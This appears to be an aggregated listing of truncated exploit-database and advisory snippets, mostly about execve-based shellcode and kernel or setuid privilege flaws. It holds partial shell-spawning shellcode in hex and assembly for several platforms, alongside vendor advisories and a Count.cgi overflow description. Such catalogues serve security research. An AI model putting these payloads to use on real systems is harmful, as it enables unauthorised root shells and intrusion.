Race you to the kernel!

Posted by Ian Beer of Google Project Zero The OS X and iOS kernel code responsible for loading a setuid root binary invalidates the old task port after first swapping the new virtual memory map pointer into the old task object, leaving a short race window where you can manipulate the memory of an...

linux/x86-64 execve/bin/sh 30 bytes

linux/x86-64 execve/bin/sh 30 bytes. Shellcode exploit for linx86-64 platform / William Borskey 2015 Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm. 1 ; int execveconst char filename, char const argv, char const envp; 2 BITS 64 3 4 sectio...

Linux MIPS execve-vulnerability warning-the black bar safety net

include stdio. h / Sanguine@debian-mipsel:/leaveret cat MIPS36bsc. s . section . text . globl start . set noreorder start: slti $a2, $zero, -1 set a1 to zero p: bltzal $a2, p not branch always and save ra slti $a1, $zero, -1 set a1 to zero addu $a0, $ra, 4 0 9 7 a0 + 1 6 addu $a0, $a0, -4081 li...

Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes

No description provided by source. / Title: Linux x86 - polymorphic execve/bin/bash, /bin/bash, -p, NULL - 57 bytes Author: Jonathan Salwan Mail: [email protected] Web: http://www.shell-storm.org !Database of Shellcodes http://www.shell-storm.org/shellcode/ sh sets euid, egid to uid, gid if ...

linux/x86 execve(""/bin/ash"" 0 0)

No description provided by source. / 21 byte execve"/bin/ash",0,0; shellcode for linux x86 by zasta zasta at darkircop.org / include unistd.h include stdio.h char shellcode = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68" "\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80"; void code asm" xor %ecx,%ecx...

BSD/x86 - execve(/bin/sh) - 27 bytes

No description provided by source. / execvesh.c by n0gada 27 bytes. / include "stdio.h" char shellcode= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int mainvoid int ret; printf"%d\n",strlenshellcode; ret = int &ret+2; ret = intshellcode; return...

Count.cgi(wwwcount)远程缓冲区溢出漏洞

BugCVE: CVE-1999-0021 BUGTRAQ: 128 Count.cgi wwwcount是一个非常流行的Web站点跟踪统计CGI程序。一般它作为Web页面点击数统计。1997年10月，这个程序被发现了两个远程漏洞。第一个漏洞比较轻微，它能允许远程用户浏览到受限制的.GIF文件，可能泄漏.GIF文件里潜在的敏感数据。 第二个漏洞比较严重，count.cgi程序在处理QUERYSTRING环境变量的时候存在缓冲区溢出漏洞。远程攻击者可以发送一个超长的请求给程序就能进行溢出攻击，以Web用户的权限在系统执行任意命令。 2.3 Muhammad A. Muquit...

CentOS 3 : kernel (CESA-2005:293)

Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 3 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel handles the basic functions of the operating syste...

linux/x86 /bin/sh sysenter Opcode Array Payload 23 Bytes

No description provided by source. / lnxbinsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload Copyrightc 2005 c0ntex [email protected] Copyrightc 2005 BaCkSpAcE [email protected] This program is free software; you can redistribute it and/or modify it under the terms of the GNU...

Linux kernel ia32 compatibility for 64 bit platforms race condtions

Race conditions with heap memory corruption in execve syscall...

RHEL 3 : kernel (RHSA-2005:293)

Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 3 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel handles the basic functions of the operating syste...

Important: Red Hat Security Advisory: kernel security update

Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 3 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel handles the basic functions of the operating syste...

freebsd/x86 - execve /tmp/sh 34 bytes

freebsd/x86 execve /tmp/sh 34 bytes. Shellcode exploit for freebsdx86 platform / FreeBSD shellcode - execve /tmp/sh Claes M. Nyberg 20020120 , / / void main asm" xorl %eax, %eax eax = 0 pushl %eax string ends with NULL pushl $0x68732f2f push 'hs//' //sh pushl $0x706d742f push 'pmt/' /tmp movl %es...

bsd/PPC - execve /bin/sh 128 bytes

bsd/PPC execve /bin/sh 128 bytes. Shellcode exploit for bsdppc platform / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode = / Palante's BSD PPC shellcode w/ NULL/ 0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4, 0x38E67FF3,...

Security Advisory : FreeBSD local DoS

Security Advisory : FreeBSD local DoS Systems affected: FreeBSD 5.1-RELEASE/Alpha. Other versions are probably vulnerable. FreeBSD 5.1-RELEASE/IA32 is not vulnerable. Not sure about other FreeBSD/arch but they could be vulnerable too. Risk: low Date: 23 June 2004 Legal notice: 1. This Advisory is...

freebsd.local.txt

Security Advisory : FreeBSD local DoS Systems affected: FreeBSD 5.1-RELEASE/Alpha. Other versions are probably vulnerable. FreeBSD 5.1-RELEASE/IA32 is not vulnerable. Not sure about other FreeBSD/arch but they could be vulnerable too. Risk: low Date: 23 June 2004 Legal notice: 1. This Advisory is...

UNIX 7th Edition binmkdir - Local Buffer Overflow

UNIX 7th Edition binmkdir - Local Buffer Overflow / Exploit for /bin/mkdir Unix V7 PDP-11. mkdir has a buffer overflow when checking if the directory in /arg/with/slashes/fname exists. This will run /bin/sh with euid 0, but not uid 0. Since the shell doesn't do anything special about this, we don...